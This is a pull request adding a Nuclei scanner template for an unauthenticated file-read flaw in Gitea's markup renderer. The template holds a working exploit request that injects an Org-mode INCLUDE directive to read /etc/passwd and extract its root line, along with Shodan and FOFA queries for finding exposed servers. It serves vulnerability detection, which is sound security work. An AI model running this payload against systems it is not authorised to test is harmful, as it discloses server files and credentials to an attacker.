### PR TITLE
Add CVE-2026-59774 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-59774.yaml
+++ b/http/cves/2026/CVE-2026-59774.yaml
@@ -1,0 +1,85 @@
+id: CVE-2026-59774
+
+info:
+  name: Gitea 1.22.1-1.27.0 - Unauthenticated Arbitrary File Read
+  author: str4k3r
+  severity: critical
+  description: |
+    Gitea versions 1.22.1 through 1.27.0 initialize the go-org markup renderer
+    without replacing its default ReadFile callback. An unauthenticated client
+    can submit Org-mode markup to a public repository's markup endpoint and
+    cause the server to read and render a file accessible to the Gitea service
+    user. The repository is discovered dynamically so the probe does not rely
+    on a lab-created repository name.
+  impact: |
+    An attacker may disclose files readable by the Gitea service account,
+    including application configuration and credentials.
+  remediation: |
+    Update Gitea to version 1.27.1 or later.
+  reference:
+    - https://github.com/go-gitea/gitea/security/advisories/GHSA-6v53-hr58-556r
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-59774
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-59774
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: go-gitea
+    product: gitea
+    shodan-query: http.title:"Gitea"
+    fofa-query: title="Gitea"
+  tags: cve,cve2026,gitea,lfi,traversal,markup,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/repos/search?limit=1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"full_name\":")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        name: reponame
+        part: body
+        json:
+          - '.data[0].full_name'
+        internal: true
+
+  - raw:
+      - |
+        POST /{{reponame}}/markup HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mode=file&file_path=a.org&text=%23%2BINCLUDE%3A%20%22%2Fetc%2Fpasswd%22%20src%20shell
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "chroma language-bash"
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:[^<]*'


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-59774. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.